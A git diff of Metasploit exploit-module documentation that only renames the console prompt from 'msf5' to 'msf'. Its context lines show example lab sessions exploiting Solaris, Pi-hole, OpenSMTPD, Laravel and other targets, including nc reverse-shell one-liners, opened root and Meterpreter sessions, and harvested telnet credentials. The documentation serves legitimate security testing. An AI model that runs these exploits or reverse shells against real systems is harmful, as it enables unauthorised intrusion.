@@ -44,12 +44,12 @@ ## Scenarios ``` - msf5 > use exploit/qnx/local/ifwatchd_priv_esc - msf5 exploit(qnx/local/ifwatchd_priv_esc) > set session 1 + msf > use exploit/qnx/local/ifwatchd_priv_esc + msf exploit(qnx/local/ifwatchd_priv_esc) > set session 1 session => 1 - msf5 exploit(qnx/local/ifwatchd_priv_esc) > set lhost 172.16.191.188 + msf exploit(qnx/local/ifwatchd_priv_esc) > set lhost 172.16.191.188 lhost => 172.16.191.188 - msf5 exploit(qnx/local/ifwatchd_priv_esc) > run + msf exploit(qnx/local/ifwatchd_priv_esc) > run [*] Started reverse TCP handler on 172.16.191.188:4444 [*] Writing interface arrival event script... diff --git a/documentation/modules/exploit/solaris/local/extremeparr_dtappgather_priv_esc.md b/documentation/modules/exploit/solaris/local/extremeparr_dtappgather_priv_esc.md index cd00c5e4ef..68707775e7 100644 --- a/documentation/modules/exploit/solaris/local/extremeparr_dtappgather_priv_esc.md +++ b/documentation/modules/exploit/solaris/local/extremeparr_dtappgather_priv_esc.md @@ -67,12 +67,12 @@ ### Solaris 10u1 (x86) ``` - msf5 > use exploit/solaris/local/extremeparr_dtappgather_priv_esc - msf5 exploit(solaris/local/extremeparr_dtappgather_priv_esc) > set session 1 + msf > use exploit/solaris/local/extremeparr_dtappgather_priv_esc + msf exploit(solaris/local/extremeparr_dtappgather_priv_esc) > set session 1 session => 1 - msf5 exploit(solaris/local/extremeparr_dtappgather_priv_esc) > set lhost 172.16.191.196 + msf exploit(solaris/local/extremeparr_dtappgather_priv_esc) > set lhost 172.16.191.196 lhost => 172.16.191.196 - msf5 exploit(solaris/local/extremeparr_dtappgather_priv_esc) > run + msf exploit(solaris/local/extremeparr_dtappgather_priv_esc) > run [*] Started reverse TCP handler on 172.16.191.196:4444 [+] Created directory /usr/lib/locale/ExDmW 
diff --git a/documentation/modules/exploit/solaris/local/libnspr_nspr_log_file_priv_esc.md b/documentation/modules/exploit/solaris/local/libnspr_nspr_log_file_priv_esc.md index a96c9f1f7e..a54c674147 100644 --- a/documentation/modules/exploit/solaris/local/libnspr_nspr_log_file_priv_esc.md +++ b/documentation/modules/exploit/solaris/local/libnspr_nspr_log_file_priv_esc.md @@ -55,12 +55,12 @@ ## Scenarios ``` - msf5 > use exploit/solaris/local/libnspr_nspr_log_file_priv_esc - msf5 exploit(solaris/local/libnspr_nspr_log_file_priv_esc) > set session 1 + msf > use exploit/solaris/local/libnspr_nspr_log_file_priv_esc + msf exploit(solaris/local/libnspr_nspr_log_file_priv_esc) > set session 1 session => 1 - msf5 exploit(solaris/local/libnspr_nspr_log_file_priv_esc) > set lhost 172.16.191.196 + msf exploit(solaris/local/libnspr_nspr_log_file_priv_esc) > set lhost 172.16.191.196 lhost => 172.16.191.196 - msf5 exploit(solaris/local/libnspr_nspr_log_file_priv_esc) > run + msf exploit(solaris/local/libnspr_nspr_log_file_priv_esc) > run [*] Started reverse TCP handler on 172.16.191.196:4444 [+] Created file /usr/lib/secure/libldap.so.5 diff --git a/documentation/modules/exploit/solaris/local/rsh_stack_clash_priv_esc.md b/documentation/modules/exploit/solaris/local/rsh_stack_clash_priv_esc.md index 3c06dcecbb..8c55a8b014 100644 --- a/documentation/modules/exploit/solaris/local/rsh_stack_clash_priv_esc.md +++ b/documentation/modules/exploit/solaris/local/rsh_stack_clash_priv_esc.md 
@@ -58,12 +58,12 @@ ### Solaris 11.3 (x86) ``` - msf5 > use exploit/solaris/local/rsh_stack_clash_priv_esc - msf5 exploit(solaris/local/rsh_stack_clash_priv_esc) > set session 1 + msf > use exploit/solaris/local/rsh_stack_clash_priv_esc + msf exploit(solaris/local/rsh_stack_clash_priv_esc) > set session 1 session => 1 - msf5 exploit(solaris/local/rsh_stack_clash_priv_esc) > set rhost 172.16.191.221 + msf exploit(solaris/local/rsh_stack_clash_priv_esc) > set rhost 172.16.191.221 rhost => 172.16.191.221 - msf5 exploit(solaris/local/rsh_stack_clash_priv_esc) > run + msf exploit(solaris/local/rsh_stack_clash_priv_esc) > run [!] SESSION may not be compatible with this module. [*] Using target: Solaris 11.3 diff --git a/documentation/modules/exploit/solaris/local/xscreensaver_log_priv_esc.md b/documentation/modules/exploit/solaris/local/xscreensaver_log_priv_esc.md index 7dfed50c72..3126d0fd5e 100644 --- a/documentation/modules/exploit/solaris/local/xscreensaver_log_priv_esc.md +++ b/documentation/modules/exploit/solaris/local/xscreensaver_log_priv_esc.md @@ -47,12 +47,12 @@ ### Solaris 11.3 (x86) ``` - msf5 > use exploit/solaris/local/xscreensaver_log_priv_esc - msf5 exploit(solaris/local/xscreensaver_log_priv_esc) > set session 1 + msf > use exploit/solaris/local/xscreensaver_log_priv_esc + msf exploit(solaris/local/xscreensaver_log_priv_esc) > set session 1 session => 1 - msf5 exploit(solaris/local/xscreensaver_log_priv_esc) > set lhost 172.16.191.165 + msf exploit(solaris/local/xscreensaver_log_priv_esc) > set lhost 172.16.191.165 lhost => 172.16.191.165 - msf5 exploit(solaris/local/xscreensaver_log_priv_esc) > run + msf exploit(solaris/local/xscreensaver_log_priv_esc) > run [*] Started reverse TCP handler on 172.16.191.165:4444 [*] Starting Xorg on display :1 ... 
diff --git a/documentation/modules/exploit/unix/fileformat/metasploit_libnotify_cmd_injection.md b/documentation/modules/exploit/unix/fileformat/metasploit_libnotify_cmd_injection.md index 85c21ba84c..0adee0bbda 100644 --- a/documentation/modules/exploit/unix/fileformat/metasploit_libnotify_cmd_injection.md +++ b/documentation/modules/exploit/unix/fileformat/metasploit_libnotify_cmd_injection.md @@ -32,8 +32,8 @@ command. ``` -msf5 > use exploit/unix/fileformat/metasploit_libnotify_cmd_injection -msf5 exploit(unix/fileformat/metasploit_libnotify_cmd_injection) > show options +msf > use exploit/unix/fileformat/metasploit_libnotify_cmd_injection +msf exploit(unix/fileformat/metasploit_libnotify_cmd_injection) > show options Module options (exploit/unix/fileformat/metasploit_libnotify_cmd_injection): @@ -60,12 +60,12 @@ Exploit target: 0 Automatic -msf5 exploit(unix/fileformat/metasploit_libnotify_cmd_injection) > exploit +msf exploit(unix/fileformat/metasploit_libnotify_cmd_injection) > exploit [*] Writing xml file: scan.xml [+] scan.xml stored at /home/smcintyre/.msf4/local/scan.xml -msf5 exploit(unix/fileformat/metasploit_libnotify_cmd_injection) > use exploit/multi/handler -msf5 exploit(multi/handler) > show options +msf exploit(unix/fileformat/metasploit_libnotify_cmd_injection) > use exploit/multi/handler +msf exploit(multi/handler) > show options Module options (exploit/multi/handler): 
@@ -89,29 +89,29 @@ Exploit target: 0 Wildcard Target -msf5 exploit(multi/handler) > exploit +msf exploit(multi/handler) > exploit [*] Started reverse TCP handler on 192.168.159.128:4444 ^C[-] Exploit failed [user-interrupt]: Interrupt [-] exploit: Interrupted -msf5 exploit(multi/handler) > exploit -j +msf exploit(multi/handler) > exploit -j [*] Exploit running as background job 3. [*] Exploit completed, but no session was created. [*] Started reverse TCP handler on 192.168.159.128:4444 -msf5 exploit(multi/handler) > version +msf exploit(multi/handler) > version Framework: 5.0.76-dev-50cfb07cff Console : 5.0.76-dev-50cfb07cff -msf5 exploit(multi/handler) > load libnotify +msf exploit(multi/handler) > load libnotify [*] Successfully loaded plugin: libnotify -msf5 exploit(multi/handler) > services -d +msf exploit(multi/handler) > services -d Services ======== host port proto name state info ---- ---- ----- ---- ----- ---- -msf5 exploit(multi/handler) > db_import /home/smcintyre/.msf4/local/scan.xml +msf exploit(multi/handler) > db_import /home/smcintyre/.msf4/local/scan.xml [*] Importing 'Nmap XML' data [*] Import: Parsing with 'Nokogiri v1.10.8' [*] Importing host 192.168.20.121 @@ -120,9 +120,9 @@ sh: line 2: Proto:: command not found sh: -c: line 3: unexpected EOF while looking for matching `'' sh: -c: line 4: syntax error: unexpected end of file [*] Successfully imported /home/smcintyre/.msf4/local/scan.xml -msf5 exploit(multi/handler) > [*] Command shell session 4 opened (192.168.159.128:4444 -> 192.168.159.128:35516) at 2020-04-16 14:54:39 -0400 +msf exploit(multi/handler) > [*] Command shell session 4 opened (192.168.159.128:4444 -> 192.168.159.128:35516) at 2020-04-16 14:54:39 -0400 -msf5 exploit(multi/handler) > sessions -i 4 +msf exploit(multi/handler) > sessions -i 4 [*] Starting interaction with 4... id 
diff --git a/documentation/modules/exploit/unix/http/laravel_token_unserialize_exec.md b/documentation/modules/exploit/unix/http/laravel_token_unserialize_exec.md index cd1ee22c2f..a28dea345f 100644 --- a/documentation/modules/exploit/unix/http/laravel_token_unserialize_exec.md +++ b/documentation/modules/exploit/unix/http/laravel_token_unserialize_exec.md @@ -27,13 +27,13 @@ The module may also uses CVE-2017-16894 to check for a leaked key. Another leake ## Scenarios ``` -msf5 exploit(unix/http/laravel_token_unserialize_exec) > check +msf exploit(unix/http/laravel_token_unserialize_exec) > check [*] 172.22.222.112:8000 - APP_KEY not set. Will try to find it... [*] 172.22.222.112:8000 - Checking for CVE-2017-16894 .env information leak [+] 172.22.222.112:8000 - APP_KEY Found via Laravel Framework error information leak: uV1jO3mpnhtdvcsSi1EIUVtSMBXeAvWtL3lmNwx7n9Q= [+] 172.22.222.112:8000 - The target is vulnerable. -msf5 exploit(unix/http/laravel_token_unserialize_exec) > exploit +msf exploit(unix/http/laravel_token_unserialize_exec) > exploit [*] Started reverse TCP handler on 172.22.222.136:4444 [*] 172.22.222.112:8000 - APP_KEY not set. Will try to find it... diff --git a/documentation/modules/exploit/unix/http/pihole_blocklist_exec.md b/documentation/modules/exploit/unix/http/pihole_blocklist_exec.md index 7abed0fdda..93f9c3a643 100644 --- a/documentation/modules/exploit/unix/http/pihole_blocklist_exec.md +++ b/documentation/modules/exploit/unix/http/pihole_blocklist_exec.md 
@@ -57,7 +57,7 @@ Password for the web interface. Randomly set on install. Use `pihole -a -p` to [*] Exploit completed, but no session was created. [*] Started reverse TCP handler on 1.1.1.1:4444 - msf5 exploit(unix/http/pihole_blocklist_exec) > [+] Version Detected: 4.3.2 + msf exploit(unix/http/pihole_blocklist_exec) > [+] Version Detected: 4.3.2 [*] Using URL: http://1.1.1.1:80/ [*] Using cookie: PHPSESSID=45abdcp4rsc9bpi9tchi88ejnn; [*] Using token: WzmrFbksWxIbtuSVeyrf8yv9o541UdhueLN+BRXfUmY= @@ -73,7 +73,7 @@ Password for the web interface. Randomly set on install. Use `pihole -a -p` to [+] Deleted cdJWzln.php [*] Server stopped. - msf5 exploit(unix/http/pihole_blocklist_exec) > sessions -1 + msf exploit(unix/http/pihole_blocklist_exec) > sessions -1 [*] Starting interaction with 1... meterpreter > getuid @@ -106,7 +106,7 @@ Password for the web interface. Randomly set on install. Use `pihole -a -p` to [*] Exploit completed, but no session was created. [*] Started reverse TCP handler on 1.1.1.1:4444 - msf5 exploit(unix/http/pihole_blocklist_exec) > [+] Version Detected: 4.4 + msf exploit(unix/http/pihole_blocklist_exec) > [+] Version Detected: 4.4 [*] Using URL: http://1.1.1.1:80/ [*] Using cookie: PHPSESSID=uee4gcfsjk5m8289m4uk4rv1du; [*] Using token: uO4ha1e0fy+Qwvoq14XgslT3Z+VJ/h2RR3qyVT6dPz8= @@ -127,7 +127,7 @@ Password for the web interface. Randomly set on install. Use `pihole -a -p` to [*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:48636) at 2020-05-13 20:34:33 -0400 [+] Deleted VRwxqyhs.php - msf5 exploit(unix/http/pihole_blocklist_exec) > sessions -1 + msf exploit(unix/http/pihole_blocklist_exec) > sessions -1 [*] Starting interaction with 1... meterpreter > getuid diff --git a/documentation/modules/exploit/unix/http/pihole_dhcp_mac_exec.md b/documentation/modules/exploit/unix/http/pihole_dhcp_mac_exec.md index a14c7c8fc9..3f1c422738 100644 --- a/documentation/modules/exploit/unix/http/pihole_dhcp_mac_exec.md 
+++ b/documentation/modules/exploit/unix/http/pihole_dhcp_mac_exec.md @@ -108,19 +108,19 @@ Password for the web interface. Randomly set on install. Use `pihole -a -p` to ### Pi-Hole 4.3 with AdminLTE 4.3 on Ubuntu 18.04 ``` - msf5 > use exploit/unix/http/pihole_dhcp_mac_exec + msf > use exploit/unix/http/pihole_dhcp_mac_exec [*] Using exploit/unix/http/pihole_dhcp_mac_exec - msf5 exploit(unix/http/pihole_dhcp_mac_exec) > set rhosts 2.2.2.2 + msf exploit(unix/http/pihole_dhcp_mac_exec) > set rhosts 2.2.2.2 rhosts => 2.2.2.2 - msf5 exploit(unix/http/pihole_dhcp_mac_exec) > set lhost 1.1.1.1 + msf exploit(unix/http/pihole_dhcp_mac_exec) > set lhost 1.1.1.1 lhost => 1.1.1.1 - msf5 exploit(unix/http/pihole_dhcp_mac_exec) > set lport 8888 + msf exploit(unix/http/pihole_dhcp_mac_exec) > set lport 8888 lport => 8888 - msf5 exploit(unix/http/pihole_dhcp_mac_exec) > set password password123 + msf exploit(unix/http/pihole_dhcp_mac_exec) > set password password123 password => password123 - msf5 exploit(unix/http/pihole_dhcp_mac_exec) > set verbose true + msf exploit(unix/http/pihole_dhcp_mac_exec) > set verbose true verbose => true - msf5 exploit(unix/http/pihole_dhcp_mac_exec) > run + msf exploit(unix/http/pihole_dhcp_mac_exec) > run [+] mkfifo /tmp/wvfacoc; nc 1.1.1.1 8888 0/tmp/wvfacoc 2>&1; rm /tmp/wvfacoc [*] Started reverse TCP handler on 1.1.1.1:8888 diff --git a/documentation/modules/exploit/unix/http/pihole_whitelist_exec.md b/documentation/modules/exploit/unix/http/pihole_whitelist_exec.md index 3dda94b154..52be9b5697 100644 --- a/documentation/modules/exploit/unix/http/pihole_whitelist_exec.md +++ b/documentation/modules/exploit/unix/http/pihole_whitelist_exec.md 
@@ -56,12 +56,12 @@ Password for the web interface. Randomly set on install. Use `pihole -a -p` to ### Pi-Hole 3.2.1 with AdminLTE 3.2.1 on Ubuntu 18.04 ``` - msf5 > use exploit/unix/http/pihole_whitelist_exec - msf5 exploit(unix/http/pihole_whitelist_exec) > set rhosts 2.2.2.2 + msf > use exploit/unix/http/pihole_whitelist_exec + msf exploit(unix/http/pihole_whitelist_exec) > set rhosts 2.2.2.2 rhosts => 2.2.2.2 - msf5 exploit(unix/http/pihole_whitelist_exec) > set verbose true + msf exploit(unix/http/pihole_whitelist_exec) > set verbose true verbose => true - msf5 exploit(unix/http/pihole_whitelist_exec) > run + msf exploit(unix/http/pihole_whitelist_exec) > run [*] Started reverse TCP handler on 1.1.1.1:4444 [+] Version Detected: 3.2.1 diff --git a/documentation/modules/exploit/unix/http/quest_kace_systems_management_rce.md b/documentation/modules/exploit/unix/http/quest_kace_systems_management_rce.md index 8a35ced1db..38f8bacaa9 100644 --- a/documentation/modules/exploit/unix/http/quest_kace_systems_management_rce.md +++ b/documentation/modules/exploit/unix/http/quest_kace_systems_management_rce.md 
@@ -48,16 +48,16 @@ ## Scenarios ``` - msf5 > use exploit/unix/http/quest_kace_systems_management_rce - msf5 exploit(unix/http/quest_kace_systems_management_rce) > set rhost 172.16.123.123 + msf > use exploit/unix/http/quest_kace_systems_management_rce + msf exploit(unix/http/quest_kace_systems_management_rce) > set rhost 172.16.123.123 rhost => 172.16.123.123 - msf5 exploit(unix/http/quest_kace_systems_management_rce) > check + msf exploit(unix/http/quest_kace_systems_management_rce) > check [*] 172.16.123.123:80 The target appears to be vulnerable. - msf5 exploit(unix/http/quest_kace_systems_management_rce) > set ORGANIZATION 1 + msf exploit(unix/http/quest_kace_systems_management_rce) > set ORGANIZATION 1 ORGANIZATION => 1 - msf5 exploit(unix/http/quest_kace_systems_management_rce) > set AGENT_VERSION 8.0.152 + msf exploit(unix/http/quest_kace_systems_management_rce) > set AGENT_VERSION 8.0.152 AGENT_VERSION => 8.0.152 - msf5 exploit(unix/http/quest_kace_systems_management_rce) > run + msf exploit(unix/http/quest_kace_systems_management_rce) > run [*] Started reverse TCP handler on 172.16.123.188:4444 [*] Sending payload (505 bytes) diff --git a/documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md b/documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md index c01021f1cb..42fb1969d4 100644 --- a/documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md +++ b/documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md 
@@ -27,13 +27,13 @@ You should set a new SSH password to the vulnerable device. **Schneider Electric Pelco Encoder NET5501-XT** -msf5 exploit(unix/http/schneider_electric_net55xx_encoder) > set RHOSTS 192.168.34.2 +msf exploit(unix/http/schneider_electric_net55xx_encoder) > set RHOSTS 192.168.34.2 RHOSTS => 192.168.34.2 -msf5 exploit(unix/http/schneider_electric_net55xx_encoder) > set RPORT 80 +msf exploit(unix/http/schneider_electric_net55xx_encoder) > set RPORT 80 RPORT => 80 -msf5 exploit(unix/http/schneider_electric_net55xx_encoder) > set NEW_PASSWORD msfrapid7 +msf exploit(unix/http/schneider_electric_net55xx_encoder) > set NEW_PASSWORD msfrapid7 NEW_PASSWORD => msfrapid7 -msf5 exploit(unix/http/schneider_electric_net55xx_encoder) > run +msf exploit(unix/http/schneider_electric_net55xx_encoder) > run [] 192.168.34.2:22 - Attempt to start a SSH connection... [] 192.168.34.2:80 - Attempt to change the root password... diff --git a/documentation/modules/exploit/unix/http/xdebug_unauth_exec.md b/documentation/modules/exploit/unix/http/xdebug_unauth_exec.md index c7447f2fdf..f00d2c592a 100644 --- a/documentation/modules/exploit/unix/http/xdebug_unauth_exec.md +++ b/documentation/modules/exploit/unix/http/xdebug_unauth_exec.md @@ -97,7 +97,7 @@ You should see a fairly small number, in my case `4.6014785766602E-5`, which ind ### XDebug 2.5.5 on Ubuntu 16.04 with Apache2 2.4.18 -msf5 exploit(unix/http/xdebug_unauth_exec) > check +msf exploit(unix/http/xdebug_unauth_exec) > check [*] 192.168.69.2:80 - Request sent Date: Fri, 27 Apr 2018 21:00:37 GMT @@ -112,7 +112,7 @@ Content-Type: text/html; charset=UTF-8 [*] 192.168.69.2:80 The target service is running, but could not be validated. -msf5 exploit(unix/http/xdebug_unauth_exec) > exploit +msf exploit(unix/http/xdebug_unauth_exec) > exploit [*] Started reverse TCP handler on 192.168.69.1:4444 [*] 192.168.69.2:80 - Waiting for client response. 
diff --git a/documentation/modules/exploit/unix/http/zivif_ipcheck_exec.md b/documentation/modules/exploit/unix/http/zivif_ipcheck_exec.md index f7e78eb9ee..1097f522d7 100644 --- a/documentation/modules/exploit/unix/http/zivif_ipcheck_exec.md +++ b/documentation/modules/exploit/unix/http/zivif_ipcheck_exec.md 
@@ -25,28 +25,28 @@ ``` - msf5 > use exploit/unix/http/zivif_ipcheck_exec - msf5 exploit(unix/http/zivif_ipcheck_exec) > set rhost 192.168.0.35 + msf > use exploit/unix/http/zivif_ipcheck_exec + msf exploit(unix/http/zivif_ipcheck_exec) > set rhost 192.168.0.35 rhost => 192.168.0.35 - msf5 exploit(unix/http/zivif_ipcheck_exec) > set PAYLOAD payload/cmd/unix/generic + msf exploit(unix/http/zivif_ipcheck_exec) > set PAYLOAD payload/cmd/unix/generic PAYLOAD => cmd/unix/generic - msf5 exploit(unix/http/zivif_ipcheck_exec) > set CMD telenetd + msf exploit(unix/http/zivif_ipcheck_exec) > set CMD telenetd CMD => telenetd - msf5 exploit(unix/http/zivif_ipcheck_exec) > exploit + msf exploit(unix/http/zivif_ipcheck_exec) > exploit [*] Sending request [+] Command sent successfully [*] Exploit completed, but no session was created. - msf5 exploit(unix/http/zivif_ipcheck_exec) > - msf5 exploit(unix/http/zivif_ipcheck_exec) > back - msf5 > use auxiliary/scanner/telnet/telnet_login - msf5 auxiliary(scanner/telnet/telnet_login) > set RHOSTS 192.168.0.0/24 + msf exploit(unix/http/zivif_ipcheck_exec) > + msf exploit(unix/http/zivif_ipcheck_exec) > back + msf > use auxiliary/scanner/telnet/telnet_login + msf auxiliary(scanner/telnet/telnet_login) > set RHOSTS 192.168.0.0/24 RHOSTS => 192.168.0.0/24 - msf5 auxiliary(scanner/telnet/telnet_login) > set USERPASS_FILE /root/creds + msf auxiliary(scanner/telnet/telnet_login) > set USERPASS_FILE /root/creds USERPASS_FILE => /root/creds - msf5 auxiliary(scanner/telnet/telnet_login) > set threads 10 + msf auxiliary(scanner/telnet/telnet_login) > set threads 10 threads => 10 - msf5 auxiliary(scanner/telnet/telnet_login) > exploit + msf auxiliary(scanner/telnet/telnet_login) > exploit [!] 192.168.0.34:23 - No active DB -- Credential data will not be saved! [+] 192.168.0.34:23 - 192.168.0.34:23 - Login Successful: root:cat1029 
@@ -56,8 +56,8 @@ [-] 192.168.0.34:23 - 192.168.0.34:23 - LOGIN FAILED: admin:cat1029 (Incorrect: ) [*] 192.168.0.34:23 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed - msf5 auxiliary(scanner/telnet/telnet_login) > - msf5 auxiliary(scanner/telnet/telnet_login) > sessions + msf auxiliary(scanner/telnet/telnet_login) > + msf auxiliary(scanner/telnet/telnet_login) > sessions Active sessions =============== @@ -66,7 +66,7 @@ -- ---- ---- ----------- ---------- 1 shell TELNET root:cat1029 (192.168.0.34:23) 0.0.0.0:0 -> 192.168.0.34:23 (192.168.0.34) - msf5 auxiliary(scanner/telnet/telnet_login) > + msf auxiliary(scanner/telnet/telnet_login) > ``` diff --git a/documentation/modules/exploit/unix/local/emacs_movemail.md b/documentation/modules/exploit/unix/local/emacs_movemail.md index 5f68530c32..25ff296a9c 100644 --- a/documentation/modules/exploit/unix/local/emacs_movemail.md +++ b/documentation/modules/exploit/unix/local/emacs_movemail.md @@ -44,8 +44,8 @@ SUID-root shell at `/tmp/sh`. ### 4.3BSD ``` -msf5 > use exploit/unix/local/emacs_movemail -msf5 exploit(unix/local/emacs_movemail) > options +msf > use exploit/unix/local/emacs_movemail +msf exploit(unix/local/emacs_movemail) > options Module options (exploit/unix/local/emacs_movemail): @@ -69,9 +69,9 @@ Exploit target: 0 /usr/lib/crontab.local -msf5 exploit(unix/local/emacs_movemail) > set session -1 +msf exploit(unix/local/emacs_movemail) > set session -1 session => -1 -msf5 exploit(unix/local/emacs_movemail) > run +msf exploit(unix/local/emacs_movemail) > run [*] Setting a sane $PATH: /bin:/usr/bin:/usr/ucb:/etc [-] Current shell is unknown @@ -84,5 +84,5 @@ msf5 exploit(unix/local/emacs_movemail) > run [+] Writing crontab to /usr/lib/crontab.local [!] Please wait at least one minute for effect [*] Exploit completed, but no session was created. -msf5 exploit(unix/local/emacs_movemail) > +msf exploit(unix/local/emacs_movemail) > ``` 
diff --git a/documentation/modules/exploit/unix/local/opensmtpd_oob_read_lpe.md b/documentation/modules/exploit/unix/local/opensmtpd_oob_read_lpe.md index 4c27729cda..b68d695740 100644 --- a/documentation/modules/exploit/unix/local/opensmtpd_oob_read_lpe.md +++ b/documentation/modules/exploit/unix/local/opensmtpd_oob_read_lpe.md @@ -33,8 +33,8 @@ Set this to a valid session ID on an OpenBSD target. ### OpenSMTPD 6.6.0 on OpenBSD 6.6 ``` -msf5 > use exploit/unix/local/opensmtpd_oob_read_lpe -msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > options +msf > use exploit/unix/local/opensmtpd_oob_read_lpe +msf exploit(unix/local/opensmtpd_oob_read_lpe) > options Module options (exploit/unix/local/opensmtpd_oob_read_lpe): @@ -62,11 +62,11 @@ Exploit target: 0 OpenSMTPD < 6.6.4 (automatic grammar selection) -msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > set lhost 172.16.249.1 +msf exploit(unix/local/opensmtpd_oob_read_lpe) > set lhost 172.16.249.1 lhost => 172.16.249.1 -msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > set session 1 +msf exploit(unix/local/opensmtpd_oob_read_lpe) > set session 1 session => 1 -msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > run +msf exploit(unix/local/opensmtpd_oob_read_lpe) > run [+] mkfifo /tmp/gkhbba; nc 172.16.249.1 4444 0/tmp/gkhbba 2>&1; rm /tmp/gkhbba [!] SESSION may not be compatible with this module. @@ -109,9 +109,9 @@ Background session 3? [y/N] y ### OpenSMTPD 6.0.4 on OpenBSD 6.3 ``` -msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > set session 2 +msf exploit(unix/local/opensmtpd_oob_read_lpe) > set session 2 session => 2 -msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > run +msf exploit(unix/local/opensmtpd_oob_read_lpe) > run [+] mkfifo /tmp/hkioy; nc 172.16.249.1 4444 0/tmp/hkioy 2>&1; rm /tmp/hkioy [!] SESSION may not be compatible with this module. diff --git a/documentation/modules/exploit/unix/misc/qnx_qconn_exec.md b/documentation/modules/exploit/unix/misc/qnx_qconn_exec.md index cbaac43c89..3afe777bef 100644 
--- a/documentation/modules/exploit/unix/misc/qnx_qconn_exec.md +++ b/documentation/modules/exploit/unix/misc/qnx_qconn_exec.md @@ -36,12 +36,12 @@ ``` - msf5 > use exploit/unix/misc/qnx_qconn_exec - msf5 exploit(unix/misc/qnx_qconn_exec) > set rhost 172.16.191.215 + msf > use exploit/unix/misc/qnx_qconn_exec + msf exploit(unix/misc/qnx_qconn_exec) > set rhost 172.16.191.215 rhost => 172.16.191.215 - msf5 exploit(unix/misc/qnx_qconn_exec) > set rport 8000 + msf exploit(unix/misc/qnx_qconn_exec) > set rport 8000 rport => 8000 - msf5 exploit(unix/misc/qnx_qconn_exec) > run + msf exploit(unix/misc/qnx_qconn_exec) > run [*] 172.16.191.215:8000 - Sending payload... [+] 172.16.191.215:8000 - Payload sent successfully diff --git a/documentation/modules/exploit/unix/smtp/morris_sendmail_debug.md b/documentation/modules/exploit/unix/smtp/morris_sendmail_debug.md index f084f9afb8..048073c839 100644 --- a/documentation/modules/exploit/unix/smtp/morris_sendmail_debug.md +++ b/documentation/modules/exploit/unix/smtp/morris_sendmail_debug.md @@ -45,8 +45,8 @@ and `cmd/unix/generic` are supported. ### `sendmail` 5.51 on 4.3BSD ``` -msf5 > use exploit/unix/smtp/morris_sendmail_debug -msf5 exploit(unix/smtp/morris_sendmail_debug) > options +msf > use exploit/unix/smtp/morris_sendmail_debug +msf exploit(unix/smtp/morris_sendmail_debug) > options Module options (exploit/unix/smtp/morris_sendmail_debug): 
@@ -71,11 +71,11 @@ Exploit target: 0 @(#)version.c 5.51 (Berkeley) 5/2/86 -msf5 exploit(unix/smtp/morris_sendmail_debug) > set rhosts 127.0.0.1 +msf exploit(unix/smtp/morris_sendmail_debug) > set rhosts 127.0.0.1 rhosts => 127.0.0.1 -msf5 exploit(unix/smtp/morris_sendmail_debug) > set lhost 192.168.56.1 +msf exploit(unix/smtp/morris_sendmail_debug) > set lhost 192.168.56.1 lhost => 192.168.56.1 -msf5 exploit(unix/smtp/morris_sendmail_debug) > run +msf exploit(unix/smtp/morris_sendmail_debug) > run [*] Started reverse TCP double handler on 192.168.56.1:4444 [*] 127.0.0.1:25 - Connecting to sendmail diff --git a/documentation/modules/exploit/unix/smtp/opensmtpd_mail_from_rce.md b/documentation/modules/exploit/unix/smtp/opensmtpd_mail_from_rce.md index 51c5f27f50..554264b293 100644 --- a/documentation/modules/exploit/unix/smtp/opensmtpd_mail_from_rce.md +++ b/documentation/modules/exploit/unix/smtp/opensmtpd_mail_from_rce.md @@ -36,8 +36,8 @@ Set this to a valid mail recipient. The default is `root`. ### OpenSMTPD 6.6.0 on OpenBSD 6.6 ``` -msf5 > use exploit/unix/smtp/opensmtpd_mail_from_rce -msf5 exploit(unix/smtp/opensmtpd_mail_from_rce) > options +msf > use exploit/unix/smtp/opensmtpd_mail_from_rce +msf exploit(unix/smtp/opensmtpd_mail_from_rce) > options Module options (exploit/unix/smtp/opensmtpd_mail_from_rce): @@ -63,11 +63,11 @@ Exploit target: 0 OpenSMTPD 6.4.0 - 6.6.1 -msf5 exploit(unix/smtp/opensmtpd_mail_from_rce) > set rhosts 172.16.249.137 +msf exploit(unix/smtp/opensmtpd_mail_from_rce) > set rhosts 172.16.249.137 rhosts => 172.16.249.137 -msf5 exploit(unix/smtp/opensmtpd_mail_from_rce) > set lhost 172.16.249.1 +msf exploit(unix/smtp/opensmtpd_mail_from_rce) > set lhost 172.16.249.1 lhost => 172.16.249.1 -msf5 exploit(unix/smtp/opensmtpd_mail_from_rce) > run +msf exploit(unix/smtp/opensmtpd_mail_from_rce) > run [+] mkfifo /tmp/twkfr; nc 172.16.249.1 4444 0/tmp/twkfr 2>&1; rm /tmp/twkfr [*] Started reverse TCP handler on 172.16.249.1:4444 
diff --git a/documentation/modules/exploit/unix/ssh/arista_tacplus_shell.md b/documentation/modules/exploit/unix/ssh/arista_tacplus_shell.md index db3afaf926..e4e09c2cf6 100644 --- a/documentation/modules/exploit/unix/ssh/arista_tacplus_shell.md +++ b/documentation/modules/exploit/unix/ssh/arista_tacplus_shell.md @@ -65,7 +65,7 @@ root@kali:~/git/metasploit-framework# ./msfconsole Metasploit tip: Display the Framework log using the log command, learn more with help log -msf5 > search arista +msf > search arista Matching Modulesf ================ @@ -75,8 +75,8 @@ Matching Modulesf 0 exploit/unix/ssh/arista_tacplus_shell 2020-02-02 great Yes Arista restricted shell escape (with privesc) -msf5 > use 0 -msf5 exploit(unix/ssh/arista_tacplus_shell) > show options +msf > use 0 +msf exploit(unix/ssh/arista_tacplus_shell) > show options Module options (exploit/unix/ssh/arista_tacplus_shell): 
